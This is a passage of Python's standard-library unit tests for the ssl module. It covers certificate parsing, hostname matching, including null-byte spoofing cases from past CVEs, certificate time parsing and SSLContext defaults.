server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
client_context.load_verify_locations(SIGNING_CA)
return client_context, server_context, hostname
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 1):
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_private_init(self):
with self.assertRaisesRegex(TypeError, "public constructor"):
with socket.socket() as s:
ssl.SSLSocket(s)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
maxDiff = None
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
self.assertEqual(
ssl._ssl._test_decode_cert(CERTFILE),
CERTFILE_INFO
)
self.assertEqual(
ssl._ssl._test_decode_cert(SIGNED_CERTFILE),
SIGNED_CERTFILE_INFO
)
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1\n'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.sendmsg,
[b'x'], (), 0, ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match wildcards when they are the only thing
# in left-most segment
cert = {'subject': ((('commonName', 'f*.com'),),)}
fail(cert, 'foo.com')
fail(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
fail(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
if hasattr(socket, 'AF_INET6'):
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (
('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"partial wildcards in leftmost label are not supported"):
ssl.match_hostname(cert, 'axxb.example.com')
cert = {'subject': ((('commonName', 'www.*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"wildcard can only be present in the leftmost label"):
ssl.match_hostname(cert, 'www.sub.example.com')
cert = {'subject': ((('commonName', 'a*b*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"too many wildcards"):
ssl.match_hostname(cert, 'axxbxxc.example.com')
cert = {'subject': ((('commonName', '*'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"sole wildcard without additional labels are not support"):
ssl.match_hostname(cert, 'host')
cert = {'subject': ((('commonName', '*.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
r"hostname 'com' doesn't match '\*.com'"):
ssl.match_hostname(cert, 'com')
# extra checks for _inet_paton()
for invalid in ['1', '', '1.2.3', '256.0.0.1', '127.0.0.1/24']:
with self.assertRaises(ValueError):
ssl._inet_paton(invalid)
for ipaddr in ['127.0.0.1', '192.168.0.1']:
self.assertTrue(ssl._inet_paton(ipaddr))
if hasattr(socket, 'AF_INET6'):
for ipaddr in ['::1', '2001:db8:85a3::8a2e:370:7334']:
self.assertTrue(ssl._inet_paton(ipaddr))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
s.listen()
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = support.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
class ContextTests(unittest.TestCase):
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipUnless(PY_SSL_DEFAULT_CIPHERS == 1,
"Test applies only to Python default ciphers")
def test_python_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ciphers = ctx.get_ciphers()
for suite in ciphers:
name = suite['name']
self.assertNotIn("PSK", name)
self.assertNotIn("SRP", name)
self.assertNotIn("MD5", name)
self.assertNotIn("RC4", name)
self.assertNotIn("3DES", name)
@unittest.skipIf(ssl.OPENSSL_VERSION_INFO < (1, 0, 2, 0, 0), 'OpenSSL too old')
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
OP_ENABLE_MIDDLEBOX_COMPAT)
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode_protocol(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
def test_hostname_checks_common_name(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.hostname_checks_common_name)
if ssl.HAS_NEVER_CHECK_COMMON_NAME:
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = False
self.assertFalse(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
else:
with self.assertRaises(AttributeError):
ctx.hostname_checks_common_name = True
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
def test_min_max_version(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
